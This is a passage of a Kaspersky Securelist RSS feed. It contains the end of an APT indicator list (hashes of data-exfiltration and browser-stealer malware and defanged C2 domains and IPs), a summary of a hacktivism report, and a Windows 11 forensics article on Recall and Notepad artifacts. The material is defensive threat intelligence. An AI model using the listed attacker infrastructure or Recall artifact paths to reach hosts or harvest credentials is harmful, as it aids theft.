href="https://opentip.kaspersky.com/cf1d14e59c38695d87d85af76db9a861/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ffa5f9bd347e41df&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">cf1d14e59c38695d87d85af76db9a861</a> SXSHARED.dll</p><p><strong>Stom Exfiltrator</strong><br /><a href="https://opentip.kaspersky.com/ff1417e8e208cadd55bf066f28821d94/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4bbcc5b773fb873b&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">ff1417e8e208cadd55bf066f28821d94</a><br /><a href="https://opentip.kaspersky.com/7ee45b465dcc1ac281378c973ae4c6a0/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______64062702f8c05486&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">7ee45b465dcc1ac281378c973ae4c6a0</a> ping.exe<br /><a href="https://opentip.kaspersky.com/b63316223e952a3a51389a623eb283b6/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______34280e71815f9819&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">b63316223e952a3a51389a623eb283b6</a> ping.exe<br /><a href="https://opentip.kaspersky.com/e525da087466ef77385a06d969f06c81/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______00c019d83beca9e0&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">e525da087466ef77385a06d969f06c81</a><br /><a href="https://opentip.kaspersky.com/78b59ea529a7bddb3d63fcbe0fe7af94/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______02431ea07e815c6c&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">78b59ea529a7bddb3d63fcbe0fe7af94</a></p><p><strong>ChromeStealer Exfiltrator</strong><br /><a href="https://opentip.kaspersky.com/9e50adb6107067ff0bab73307f5499b6/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______002f6ae0f77b2068&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">9e50adb6107067ff0bab73307f5499b6</a> WhatsAppOB.exe</p><h3 id="domains-ips">Domains/IPs</h3><p><a href="https://opentip.kaspersky.com/hxxps%3a%2f%2fstorycentral.net/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______546a9c2d940aced9&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://storycentral[.]net</a><br /><a href="https://opentip.kaspersky.com/hxxp%3a%2f%2flistofexoticplaces.com/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______df61d5264bb34b52&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxp://listofexoticplaces[.]com</a><br /><a href="https://opentip.kaspersky.com/hxxps%3a%2f%2fmonsoonconference.com/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______95a175e16a9f2f66&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxps://monsoonconference[.]com</a><br /><a href="https://opentip.kaspersky.com/hxxp%3a%2f%2fmediumblog.online/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______a1cb20769a3c44cb&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxp://mediumblog[.]online:4443</a><br /><a href="https://opentip.kaspersky.com/hxxp%3a%2f%2fcloud.givensolutions.online/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______31ac06df427819a4&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxp://cloud.givensolutions[.]online:4443</a><br /><a href="https://opentip.kaspersky.com/hxxp%3a%2f%2fcloud.qunetcentre.org/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______97e683db289c2d2d&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">hxxp://cloud.qunetcentre[.]org:443</a><br /><a href="https://opentip.kaspersky.com/solutions.fuzzy-network.tech/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______80e055d2bfaec218&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">solutions.fuzzy-network[.]tech</a><br /><a href="https://opentip.kaspersky.com/pdfplugins.com/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______fa3c26ff03f790a8&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">pdfplugins[.]com</a><br /><a href="https://opentip.kaspersky.com/file-share.officeweb.live/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______1906cf37a247699a&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">file-share.officeweb[.]live</a><br /><a href="https://opentip.kaspersky.com/fileshare-avp.ddns.net/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______324cee9e263be2af&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">fileshare-avp.ddns[.]net</a><br /><a href="https://opentip.kaspersky.com/91.132.95.148/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ab2914e9238c3621&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">91.132.95[.]148</a><br /><a href="https://opentip.kaspersky.com/62.106.66.80/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______847c267eca71ef78&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">62.106.66[.]80</a><br /><a href="https://opentip.kaspersky.com/158.255.215.45/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______2d778fa9b216c661&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">158.255.215[.]45</a></p>]]></content:encoded> <wfw:commentRss>https://securelist.com/mysterious-elephant-apt-ttps-and-tools/117596/feed/</wfw:commentRss> <slash:comments>0</slash:comments> <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30145442/mysterious-elephant-featured-image.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30145442/mysterious-elephant-featured-image-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30145442/mysterious-elephant-featured-image-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30145442/mysterious-elephant-featured-image-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content> </item> <item> <title>Signal in the noise: what hashtags reveal about hacktivism in 2025</title> <link>https://securelist.com/dfi-meta-hacktivist-report/117708/</link> <comments>https://securelist.com/dfi-meta-hacktivist-report/117708/#respond</comments> <dc:creator><![CDATA[Kaspersky Security Services]]></dc:creator> <pubDate>Tue, 14 Oct 2025 10:00:09 +0000</pubDate> <category><![CDATA[Research]]></category> <category><![CDATA[SOC, TI and IR posts]]></category> <category><![CDATA[Twitter]]></category> <category><![CDATA[Darknet]]></category> <category><![CDATA[Threat intelligence]]></category> <category><![CDATA[hacktivists]]></category> <category><![CDATA[Telegram]]></category><category><![CDATA[Cybersecurity]]></category> <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=117708</guid> <description><![CDATA[Kaspersky researchers identified over 2000 unique hashtags across 11,000 hacktivist posts on the surface web and the dark web to find out how hacktivist campaigns function and whom they target.]]></description> <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14082820/SL-DFI-META-report-featured-1200-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>What do hacktivist campaigns look like in 2025? To answer this question, we analyzed more than 11,000 posts produced by over 120 hacktivist groups circulating across both the surface web and the dark web, with a particular focus on groups targeting MENA countries. The primary goal of our research is to highlight patterns in hacktivist operations, including attack methods, public warnings, and stated intent. The analysis is undertaken exclusively from a cybersecurity perspective and anchored in the principle of neutrality.</p><p>Hacktivists are politically motivated threat actors who typically value visibility over sophistication. Their tactics are designed for maximum visibility, reach, and ease of execution, rather than stealth or technical complexity. The term “hacktivist” may refer to either the administrator of a community who initiates the attack or an ordinary subscriber who simply participates in the campaign.</p><h2 id="key-findings">Key findings</h2><p>While it may be assumed that most operations unfold on hidden forums, in fact, most hacktivist planning and mobilization happens in the open. Telegram has become the command center for today’s hacktivist groups, hosting the highest density of attack planning and calls to action. The second place is occupied by X (ex-Twitter).</p><div id="attachment_117709" style="width: 790px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13172136/META-hacktivist-channels.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117709" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13172136/META-hacktivist-channels.png" alt="Distribution of social media references in posts published in 2025" width="780" height="361" class="size-full wp-image-117709" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13172136/META-hacktivist-channels.png 780w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13172136/META-hacktivist-channels-300x139.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13172136/META-hacktivist-channels-768x355.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13172136/META-hacktivist-channels-756x350.png 756w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13172136/META-hacktivist-channels-740x342.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13172136/META-hacktivist-channels-605x280.png 605w" sizes="auto, (max-width: 780px) 100vw, 780px" /></a><p id="caption-attachment-117709" class="wp-caption-text">Distribution of social media references in posts published in 2025</p></div><p>Although we focused on hacktivists operating in MENA, the targeting of the groups under review is global, extending well beyond the region. There are victims throughout Europe and Middle East, as well as Argentina, the United States, Indonesia, India, Vietnam, Thailand, Cambodia, Türkiye, and others.</p><h3 id="hashtags-as-the-connective-tissue-of-hacktivist-operations">Hashtags as the connective tissue of hacktivist operations</h3><p>One notable feature of hacktivist posts and messages on dark web sites is the frequent use of hashtags (#words). Used in their posts constantly, hashtags often serve as political slogans, amplifying messages, coordinating activity or claiming credit for attacks. The most common themes are political statements and hacktivist groups names, though hashtags sometimes reference geographical locations, such as specific countries or cities.</p><p>Hashtags also map alliances and momentum. We have identified 2063 unique tags in 2025: 1484 appearing for the first time, and many tied directly to specific groups or joint campaigns. Most tags are short-lived, lasting about two months, with “popular” ones persisting longer when amplified by alliances; channel bans contribute to attrition.</p><p>Operationally, reports of completed attacks dominate hashtagged content (58%), and within those, DDoS is the workhorse (61%). Spikes in threatening rhetoric do not by themselves predict more attacks, but timing matters: when threats are published, they typically refer to actions in the near term, i.e. the same week or month, making early warning from open-channel monitoring materially useful.</p><p>The full version of the report details the following findings:</p><ul><li>How long it typically takes for an attack to be reported after an initial threat post</li><li>How hashtags are used to coordinate attacks or claim credit</li><li>Patterns across campaigns and regions</li><li>The types of cyberattacks being promoted or celebrated</li></ul><h2 id="practical-takeaways-and-recommendations">Practical takeaways and recommendations</h2><p>For defenders and corporate leaders, we recommend the following:</p><ul><li>Prioritize scalable DDoS mitigation and proactive security measures.</li><li>Treat public threats as short-horizon indicators rather than long-range forecasts.</li><li>Invest in continuous monitoring across Telegram and related ecosystems to discover alliance announcements, threat posts, and cross-posted “proof” rapidly.</li></ul><p>Even organizations outside geopolitical conflict zones should assume exposure: hacktivist campaigns seek reach and spectacle, not narrow geography, and hashtags remain a practical lens for separating noise from signals that demand action.</p><p><strong>To download the full report, please fill in the form below.</strong></p><p><script data-b24-form="inline/1808/7dlezh" data-skip-moving="true"> (function (w, d, u) { var s = d.createElement("script"); s.async = true; s.src = u + "?" + ((Date.now() / 180000) | 0); var h = d.getElementsByTagName("script")[0]; h.parentNode.insertBefore(s, h); })(window, document, "https://cdn.bitrix24.eu/b30707545/crm/form/loader_1808.js"); </script><br /> <script src="https://storage.yandexcloud.net/kasperskyform/validator.js"></script><br /> <script> initBxFormValidator({ formId: "inline/1808/7dlezh", emailFieldName: "CONTACT_EMAIL", redirectUrl: "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13172551/Hacktivist_report-DFI-META.pdf", naturalFieldNames: ["CONTACT_UF_CRM_NODES"], lengthRestrictedFieldNames: { CONTACT_EMAIL: 250, CONTACT_POST: 128, CONTACT_NAME: 50, CONTACT_UF_CRM_COMPANY: 255, CONTACT_UF_CRM_COMPANY_TAX_ID: 50, CONTACT_UF_CRM_PRODUCT_INTEREST: 255, CONTACT_UF_CRM_FORM_QUESTION_2: 255, CONTACT_UF_CRM_FORM_QUESTION_3: 255, CONTACT_UF_CRM_FORM_QUESTION_5: 255, }, }); </script></p>]]></content:encoded> <wfw:commentRss>https://securelist.com/dfi-meta-hacktivist-report/117708/feed/</wfw:commentRss> <slash:comments>0</slash:comments> <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14082820/SL-DFI-META-report-featured-1200.jpg" width="1200" height="762"><media:keywords>full</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14082820/SL-DFI-META-report-featured-1200-1024x650.jpg" width="1024" height="650"><media:keywords>large</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14082820/SL-DFI-META-report-featured-1200-300x191.jpg" width="300" height="191"><media:keywords>medium</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14082820/SL-DFI-META-report-featured-1200-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content> </item> <item> <title>The king is dead, long live the king! Windows 10 EOL and Windows 11 forensic artifacts</title> <link>https://securelist.com/forensic-artifacts-in-windows-11/117680/</link> <comments>https://securelist.com/forensic-artifacts-in-windows-11/117680/#respond</comments> <dc:creator><![CDATA[Kirill Magaskin]]></dc:creator> <pubDate>Tue, 14 Oct 2025 08:00:57 +0000</pubDate> <category><![CDATA[Research]]></category> <category><![CDATA[Microsoft Windows]]></category> <category><![CDATA[Digital forensics]]></category> <category><![CDATA[Forensic journey]]></category><category><![CDATA[Cybersecurity]]></category> <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=117680</guid> <description><![CDATA[With the end of Windows 10 support approaching, we discuss which forensic artifacts in Windows 11 may be of interest.]]></description> <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13154941/SL-forensic-artifacts-in-windows-11-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="introduction">Introduction</h2><p>Windows 11 was released a few years ago, yet it has seen relatively weak enterprise adoption. According to statistics from our Global Emergency Response Team (GERT) investigations, as recently as early 2025, we found that Windows 7, which reached end of support in 2020, was encountered only slightly less often than the newest operating system. Most systems still run Windows 10.</p><div class="js-infogram-embed" data-id="_/wUFDDTvIb5MX90BS2iz7" data-type="interactive" data-title="01 EN-RU-ES-PT-BR Win 11 graph" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Distribution of Windows versions in organizations’ infrastructure. The statistics are based on the Global Emergency Response Team (GERT) data (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10100944/01-en-ru-es-pt-br-win-11-graph.png" target="_blank" rel="noopener">download</a>)</em></p><p>The most widely used operating system was released more than a decade ago, and Microsoft discontinues its support on October 14, 2025. This means we are certainly going to see an increase in the number of Windows 11 systems in organizations where we provide incident response services. This is why we decided to offer a brief overview of changes to forensic artifacts in this operating system. The information should be helpful to our colleagues in the field. The artifacts described here are relevant for Windows 11 24H2, which is the latest OS version at the time of writing this.</p><h2 id="what-is-new-in-windows-11">What is new in Windows 11</h2><h3 id="recall">Recall</h3><p>The Recall feature was first introduced in May 2024. It allows the computer to remember everything a user has done on the device over the past few months. It works by taking screenshots of the entire display every few seconds. A local AI engine then analyzes these screenshots in the background, extracting all useful information, which is subsequently saved to a database. This database is then used for intelligent searching. Since May 2025, Recall has been broadly available on computers equipped with an NPU, a dedicated chip for AI computations, which is currently compatible only with ARM CPUs.</p><p>Microsoft Recall is certainly one of the most highly publicized and controversial features announced for Windows 11. Since its initial reveal, it <a href="https://www.kaspersky.com/blog/how-to-disable-copilot-recall-spyware/51522/" target="_blank" rel="noopener">has been the subject of criticism within the cybersecurity community</a> because of the potential threat it poses to data privacy. Microsoft refined Recall before its release, yet <a href="https://www.kaspersky.com/blog/recall-2025-risks-benefits/53407/" target="_blank" rel="noopener">certain concerns remain</a>. Because of its controversial nature, the option is disabled by default in corporate builds of Windows 11. However, examining the artifacts it creates is worthwhile, just in case an attacker or malicious software activates it. In theory, an organization’s IT department could enable Recall using Group Policies, but we consider that scenario unlikely.</p><p>As previously mentioned, Recall takes screenshots, which naturally requires temporary storage before analysis. The raw JPEG images can be found at <code>%AppData%\Local\CoreAIPlatform.00\UKP\{GUID}\ImageStore\*</code>. The filenames themselves are the screenshot identifiers (more on those later).</p><p>Along with the screenshots, their metadata is stored within the standard Exif.Photo.MakerNote (0x927c) tag. This tag holds a significant amount of interesting data, such as the boundaries of the foreground window, the capture timestamp, the window title, the window identifier, and the full path of the process that launched the window. Furthermore, if a browser is in use during the screenshot capture, the URI and domain may be preserved, among other details.</p><p>Recall is activated on a per-user basis. A key in the user’s registry hive, specifically <code>Software\Policies\Microsoft\Windows\WindowsAI\</code>, is responsible for enabling and disabling the saving of these screenshots. Microsoft has also introduced <a href="https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai" target="_blank" rel="noopener">several new registry keys</a> associated with Recall management in the latest Windows 11 builds.</p><p>It is important to note that the version of the feature refined following public controversy includes a specific filter intended to prevent the saving of screenshots and text when potentially sensitive information is on the screen. This includes, for example, an incognito browser window, a payment data input field, or a password manager. However, <a href="https://doublepulsar.com/microsoft-recall-on-copilot-pc-testing-the-security-and-privacy-implications-ddb296093b6c" target="_blank" rel="noopener">researchers</a> have indicated that this filter may not always engage reliably.</p><p>To enable fast searches across all data captured from screenshots, the system uses two DiskANN vector databases (<code>SemanticTextStore.sidb</code> and <code>SemanticImageStore.sidb</code>). However, the standard SQLite database is the most interesting one for investigation: <code>%AppData%\Local\CoreAIPlatform.00\UKP\{GUID}\ukg.db</code>, which consists of 20 tables. In the latest release, it is accessible without administrative privileges, yet it is encrypted. At the time of writing this post, there are no publicly known methods to decrypt the database directly. Therefore, we will examine the most relevant tables from the 2024 Windows 11 beta release with Recall.</p><ul><li>The <code>App</code> table holds data about the process that launched the application’s graphical user interface window.</li><li>The <code>AppDwellTime</code> table contains information such as the full path of the process that initiated the application GUI window (WindowsAppId column), the date and time it was launched (HourOfDay, DayOfWeek, HourStartTimestamp), and the duration the window’s display (DwellTime).</li><li>The <code>WindowCapture</code> table records the type of event (Name column):<ul><li><strong>WindowCreatedEvent</strong> indicates the creation of the first instance of the application window. It can be correlated with the process that created the window.</li><li><strong>WindowChangedEvent</strong> tracks changes to the window instance. It allows monitoring movements or size changes of the window instance with the help of the WindowId column, which contains the window’s identifier.</li><li><strong>WindowCaptureEvent</strong> signifies the creation of a screen snapshot that includes the application window. Besides the window identifier, it contains an image identifier (ImageToken). The value of this token can later be used to retrieve the JPEG snapshot file from the aforementioned ImageStore directory, as the filename corresponds to the image identifier.</li><li><strong>WindowDestroyedEvent</strong> signals the closing of the application window.</li><li><strong>ForegroundChangedEvent</strong> does not contain useful data from a forensics perspective.</li></ul><p>The <code>WindowCapture</code> table also includes a flag indicating whether the application window was in the foreground (IsForeground column), the window boundaries as screen coordinates (WindowBounds), the window title (WindowTitle), a service field for properties (Properties), and the event timestamp (TimeStamp).</li></ul><ul><li><code>WindowCaptureTextIndex_content</span></code> contains the text extracted with Optical Character Recognition (OCR) from the snapshot (c2 column), the window title (WindowTitle), the application path (App.Path), the snapshot timestamp (TimeStamp), and the name (Name). This table can be used in conjunction with the WindowCapture (the c0 and Id columns hold identical data, which can be used for joining the tables) and App tables (identical data resides in the AppId and Id columns).</li></ul><p>Recall artifacts (if the feature was enabled on the system prior to the incident) represent a “goldmine” for the incident responder. They allow for a detailed reconstruction of the attacker’s activity within the compromised system. Conversely, this same functionality can be weaponized: as mentioned previously, the private information filter in Recall does not work flawlessly. Consequently, attackers and malware can exploit it to locate credentials and other sensitive information.</p><h3 id="updated-standard-applications">Updated standard applications</h3><p>Standard applications in Windows 11 have also undergone updates, and for some, this involved changes to both the interface and functionality. Specifically, applications such as Notepad, File Explorer, and the Command Prompt in this version of the OS now support multi-tab mode. Notably, Notepad retains the state of these tabs even after the process terminates. Therefore, Windows 11 now has new artifacts associated with the usage of this application. Our colleague, AbdulRhman Alfaifi, researched these in detail; his work is available <a href="https://u0041.co/posts/articals/exploring-windows-artifacts-notepad-files/" target="_blank" rel="noopener">here</a>.</p><p>The main directory for Notepad artifacts in Windows 11 is located at <code>%LOCALAPPDATA%\Packages\Microsoft.WindowsNotepad_8wekyb3d8bbwe\LocalState\</code>.<br />This directory contains two subdirectories:</p><ul><li><strong>TabState</strong> stores a {GUID}.bin state file for each Notepad tab. This file contains the tab’s contents if the user did not save it to a file. For saved tabs, the file contains the full path to the saved content, the SHA-256 hash of the content, the content itself, the last write time to the file, and other details.</li><li><strong>WindowsState</strong> stores information about the application window state. This includes the total number of tabs, their order, the currently active tab, and the size and position of the application window on the screen. The state file is named either *.0.bin or *.1.bin.</li></ul><p>The structure of {GUID}.bin for saved tabs is as follows:</p><table><tbody><tr><td><strong>Field</strong></td><td><strong>Type</strong></td><td><strong>Value and explanation</strong></td></tr><tr><td>signature</td><td>[u8;2]</td><td>NP</td></tr><tr><td>?</td><td>u8</td><td>00</td></tr><tr><td>file_saved_to_path</td><td>bool</td><td>00 = the file was not saved at the specified path<br />01 = the file was saved</td></tr><tr><td>path_length</td><td>uLEB128</td><td>Length of the full path (in characters) to the file where the tab content was written</td></tr><tr><td>file_path</td><td>UTF-16LE</td><td>The full path to the file where the tab content was written</td></tr><tr><td>file_size</td><td>uLEB128</td><td>The size of the file on disk where the tab content was written</td></tr><tr><td>encoding</td><td>u8</td><td>File encoding:<br />0x01 – ANSI<br />0x02 – UTF-16LE<br />0x03 – UTF-16BE<br />0x04 – UTF-8BOM<br />0x05 – UTF-8</td></tr><tr><td>cr_type</td><td>u8</td><td>Type of carriage return:<br />0x01 — CRLF<br />0x02 — CR<br />0x03 — LF</td></tr><tr><td>last_write_time</td><td>uLEB128</td><td>The time of the last write (tab save) to the file, formatted as <a href="https://learn.microsoft.com/en-us/windows/win32/api/minwinbase/ns-minwinbase-filetime?redirectedfrom=MSDN" target="_blank" rel="noopener">FILETIME</a></td></tr><tr><td>sha256_hash</td><td>[u8;32]</td><td>The SHA-256 hash of the tab content</td></tr><tr><td>?</td><td>[u8;2]</td><td>00 01</td></tr><tr><td>selection_start</td><td>uLEB128</td><td>The offset of the section start from the beginning of the file</td></tr><tr><td>selection_end</td><td>uLEB128</td><td>The offset of the section end from the beginning of the file</td></tr><tr><td>config_block</td><td>ConfigBlock</td><td>ConfigBlock structure configuration</td></tr><tr><td>content_length</td><td>uLEB128</td><td>The length of the text in the file</td></tr><tr><td>content</td><td>UTF-16LE</td><td>The file content before it was modified by the new data. This field is absent if the tab was saved to disk with no subsequent modifications.</td></tr><tr><td>contain_unsaved_data</td><td>bool</td><td>00 = the tab content in the {GUID}.bin file matches the tab content in the file on disk<br />01 = changes to the tab have not been saved to disk</td></tr><tr><td>checksum</td><td>[u8;4]</td><td>The CRC32 checksum of the {GUID}.bin file content, offset by 0x03 from the start of the file</td></tr><tr><td>unsaved_chunks</td><td>[UnsavedChunk]</td><td>A list of UnsavedChunk structures. This is absent if the tab was saved to disk with no subsequent modifications</td></tr></tbody></table><div id="attachment_117682" style="width: 903px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102005/forensic-artifacts2.jpeg" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117682" class="size-full wp-image-117682" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102005/forensic-artifacts2.jpeg" alt="Example content of the {GUID.bin} file for a Notepad tab that was saved to a file and then modified with new data which was not written to the file" width="893" height="622" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102005/forensic-artifacts2.jpeg 893w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102005/forensic-artifacts2-300x209.jpeg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102005/forensic-artifacts2-768x535.jpeg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102005/forensic-artifacts2-502x350.jpeg 502w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102005/forensic-artifacts2-740x515.jpeg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102005/forensic-artifacts2-402x280.jpeg 402w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102005/forensic-artifacts2-800x557.jpeg 800w" sizes="auto, (max-width: 893px) 100vw, 893px" /></a><p id="caption-attachment-117682" class="wp-caption-text">Example content of the {GUID.bin} file for a Notepad tab that was saved to a file and then modified with new data which was not written to the file</p></div><p>For tabs that were never saved, the {GUID}.bin file structure in the TabState directory is shorter:</p><table><tbody><tr><td><strong>Field</strong></td><td><strong>Type</strong></td><td><strong>Value and explanation</strong></td></tr><tr><td>signature</td><td>[u8;2]</td><td>NP</td></tr><tr><td>?</td><td>u8</td><td>00</td></tr><tr><td>file_saved_to_path</td><td>bool</td><td>00 = the file was not saved at the specified path (always)</td></tr><tr><td>selection_start</td><td>uLEB128</td><td>The offset of the section start from the beginning of the file</td></tr><tr><td>selection_end</td><td>uLEB128</td><td>The offset of the section end from the beginning of the file</td></tr><tr><td>config_block</td><td>ConfigBlock</td><td>ConfigBlock structure configuration</td></tr><tr><td>content_length</td><td>uLEB128</td><td>The length of the text in the file</td></tr><tr><td>content</td><td>UTF-16LE</td><td>File content</td></tr><tr><td>contain_unsaved_data</td><td>bool</td><td>01 = changes to the tab have not been saved to disk (always)</td></tr><tr><td>checksum</td><td>[u8;4]</td><td>The CRC32 checksum of the {GUID}.bin file content, offset by 0x03 from the start of the file</td></tr><tr><td>unsaved_chunks</td><td>[UnsavedChunk]</td><td>List of UnsavedChunk structures</td></tr></tbody></table><div id="attachment_117683" style="width: 1190px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102254/forensic-artifacts3.jpeg" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117683" class="size-full wp-image-117683" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102254/forensic-artifacts3.jpeg" alt="Example content of the {GUID.bin} file for a Notepad tab that has not been saved to a file" width="1180" height="207" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102254/forensic-artifacts3.jpeg 1180w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102254/forensic-artifacts3-300x53.jpeg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102254/forensic-artifacts3-1024x180.jpeg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102254/forensic-artifacts3-768x135.jpeg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102254/forensic-artifacts3-740x130.jpeg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102254/forensic-artifacts3-800x140.jpeg 800w" sizes="auto, (max-width: 1180px) 100vw, 1180px" /></a><p id="caption-attachment-117683" class="wp-caption-text">Example content of the {GUID.bin} file for a Notepad tab that has not been saved to a file</p></div><p>Note that the saving of tabs may be disabled in the Notepad settings. If this is the case, the TabState and WindowState artifacts will be unavailable for analysis.</p><p>If these artifacts are available, however, you can use <a href="https://github.com/AbdulRhmanAlfaifi/notepad_parser" target="_blank" rel="noopener">the notepad_parser tool</a>, developed by our colleague Abdulrhman Alfaifi, to automate working with them.</p><p>This particular artifact may assist in recovering the contents of malicious scripts and batch files. Furthermore, it may contain the results and logs from network scanners, credential extraction utilities, and other executables used by threat actors, assuming any unsaved modifications were inadvertently made to them.</p><h2 id="changes-to-familiar-artifacts-in-windows-11">Changes to familiar artifacts in Windows 11</h2><p>In addition to the new artifacts, Windows 11 introduced several noteworthy changes to existing ones that investigators should be aware of when analyzing incidents.</p><h3 id="changes-to-ntfs-attribute-behavior">Changes to NTFS attribute 